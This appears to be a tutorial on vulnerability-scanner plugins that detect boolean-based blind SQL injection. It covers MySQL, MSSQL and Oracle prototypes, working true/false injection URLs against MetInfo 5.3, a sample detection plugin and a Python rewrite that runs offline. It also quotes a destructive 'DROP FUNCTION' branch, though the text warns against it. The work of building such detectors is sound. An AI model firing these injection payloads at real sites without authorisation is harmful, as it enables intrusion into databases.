Boolean-based blind injection plugins


Injections of this class produce no echo in the returned page, but the truth value of an injected SQL condition can be inferred from how the page responds: the plugin sends one request whose condition is always true and one whose condition is always false, and reports the hole only if the two responses differ in the expected way.

MySQL database

Method: construct a boolean expression that changes the returned result set.

Its SQL statement prototype looks like:

select * from table where 1=1;
select * from table where 1=2;
select * from table where 1>2;
select IF(1=1, 1, 2);
select IF(1=2, 1, 2);
select IF('a'='a', 1, 2);

Example

MetInfo 5.3 /include/global/listmod.php SQL injection vulnerability:

Target URLs of the requests

# Expression is true: returns the page with data
http://127.0.0.1/MetInfo/news/news.php?lang=cn&class2=5&serch_sql=123qwe where 4343=4343 -- x&imgproduct=xxxx

# Expression is false: returns the page without data
http://127.0.0.1/MetInfo/news/news.php?lang=cn&class2=5&serch_sql=123qwe where 4343=4342 -- x&imgproduct=xxxx

Vulnerability verification (pseudocode)

The value of md5(233) is e165421110ba03099a1c0393373c5b43

if the request with the true expression returns the page with data
   and the request with the false expression returns the page without data:
        security_hole(target, log=log)

Sample plugin

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: Medici.Yan
#
# fingerprint, hackhttp and security_hole are injected by the scanner
# runtime; when the file is run directly they come from dummy (see __main__).

import re

# Marker that appears only when the news query returned rows: it is the
# difference between the true-expression and false-expression responses.
MARKER = re.compile(r'href=["\' ]shownews\.php\?lang=', re.M)


def assign(service, arg):
    if service == fingerprint.metinfo:
        return True, arg


def audit(arg):
    # Plugin authors may call their own helper functions from audit()
    verify(arg)


def verify(url):
    # Both URLs are identical except for the comparison: 1234=1234 is true,
    # 1234=1235 is false, so any response difference comes from the truth value.
    target = url.rstrip('/')
    payloadtrue = "{target}/news/index.php?"\
        "serch_sql=%20123qwe%20"\
        "where%201234%3D1234%20--%20x&imgproduct=xxxx".format(target=target)

    payloadfalse = "{target}/news/index.php?"\
        "serch_sql=%20123qwe%20"\
        "where%201234%3D1235%20--%20x&imgproduct=xxxx".format(target=target)
    try:
        code1, head1, body1, redirect_url1, log1 = hackhttp.http(payloadtrue)
        # The true expression must return the list page containing the marker
        if code1 != 200 or not MARKER.search(body1):
            return

        code2, head2, body2, redirect_url2, log2 = hackhttp.http(payloadfalse)
        # ...and the false expression must return a page without it
        if code2 != 200 or MARKER.search(body2):
            return
        security_hole("%s" % (payloadtrue), log=log1)
    except Exception:
        # A network error or malformed response is not evidence of the hole
        return


if __name__ == '__main__':
    from dummy import *
    audit(assign(fingerprint.metinfo, 'http://127.0.0.1/MetInfo/')[1])
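The following is an added example, not part of this page, of MetInfo, or of the scanner framework: the same differential true/false check written as plain Python 3 with no runtime globals, so it can be run and tested offline. It builds the URL pair with urlencode instead of hand-written escapes, repeats the pair with fresh constants so a cached or constant page cannot pass, and treats non-200 responses as "not a finding". The fetch(url) -> (status, body) callback signature and the three fake_* server stand-ins are assumptions for this example; against a live host, fetch would wrap the scanner's HTTP client or requests.get.

```python
import re
from urllib.parse import urlencode, urlparse, parse_qs

# Marker that only shows up when the injected query returned rows (the same
# one the sample plugin keys on).
ROW_MARKER = re.compile(r'href=["\' ]shownews\.php\?lang=')


def build_pair(target, a, b):
    """Return (true_url, false_url) for the MetInfo-style injection point.

    The URLs differ only in the comparison: a=a is always true and a=b
    (a != b) is always false, so a response difference can only come from
    the truth value, not from a differently shaped query. urlencode handles
    the %-escaping instead of hand-written %20 / %3D sequences.
    """
    if a == b:
        raise ValueError("constants must differ")
    base = target.rstrip("/") + "/news/index.php?"

    def url(cond):
        return base + urlencode({"serch_sql": " 123qwe where %s -- x" % cond,
                                 "imgproduct": "xxxx"})

    return url("%d=%d" % (a, a)), url("%d=%d" % (a, b))


def boolean_blind(fetch, target, marker=ROW_MARKER, rounds=2):
    """Differential test: True only if the marker is present for every true
    expression and absent for every false one.

    fetch(url) -> (status, body) is whatever HTTP client the caller has
    (assumed signature). Each round uses fresh constants so a cached page,
    or a page that always or never carries the marker, cannot satisfy both
    branches.
    """
    for i in range(rounds):
        true_url, false_url = build_pair(target, 1000 + i, 2000 + i)
        status, body = fetch(true_url)
        if status != 200 or not marker.search(body):
            return False
        status, body = fetch(false_url)
        if status != 200 or marker.search(body):
            return False
    return True


# --- constructed stand-ins for the remote host so the check runs offline ---
LIST_PAGE = '<li><a href="shownews.php?lang=cn&id=1">news</a></li>'
EMPTY_PAGE = '<li>no data</li>'
WHERE_RE = re.compile(r"where\s+(\d+)=(\d+)")


def fake_vulnerable(url):
    """Evaluates the injected 'where A=B' the way the injectable query would."""
    params = parse_qs(urlparse(url).query)
    m = WHERE_RE.search(params.get("serch_sql", [""])[0])
    if m and m.group(1) == m.group(2):
        return 200, LIST_PAGE
    return 200, EMPTY_PAGE


def fake_patched(url):
    """Ignores serch_sql: the list always renders, so nothing flips."""
    return 200, LIST_PAGE


def fake_error(url):
    """Server error on every request: must not be reported as a finding."""
    return 500, ""


if __name__ == "__main__":
    for name, fetch in [("vulnerable", fake_vulnerable),
                        ("patched", fake_patched), ("error", fake_error)]:
        print(name, boolean_blind(fetch, "http://127.0.0.1/MetInfo/"))
```

Only the vulnerable stand-in passes: the patched one carries the marker in both branches and the erroring one never returns 200. The same structure applies to the MSSQL and Oracle prototypes further down; only build_pair's condition strings and the marker change.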

MSSQL database

Method: construct a boolean expression

Its SQL statement prototype looks like:

select * from xxxx where id=xxx and 1=1;
select * from xxxx where id=xxx and 1=2;
IF(1=1) SELECT 123 ELSE DROP FUNCTION xxxx;

Note that IF ... ELSE is a T-SQL control-of-flow statement, not an expression, so the third form only works where a new statement can be started (stacked queries). Its ELSE branch here is destructive; a scanner plugin must use a harmless branch on both sides (for example SELECT 123 versus SELECT 1/0) and tell them apart by the response, never drop objects on a target.

Oracle database

Method: construct a boolean expression

Its SQL statement prototype looks like:

(SELECT (CASE WHEN (1=1) THEN 123 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Plain Oracle SQL has no IF, so CASE does the branching: when the condition is true the subquery evaluates to 123; when it is false the ELSE branch divides by zero and the whole statement fails with ORA-01476, so the truth value shows up as a normal page versus an error page or an empty result.
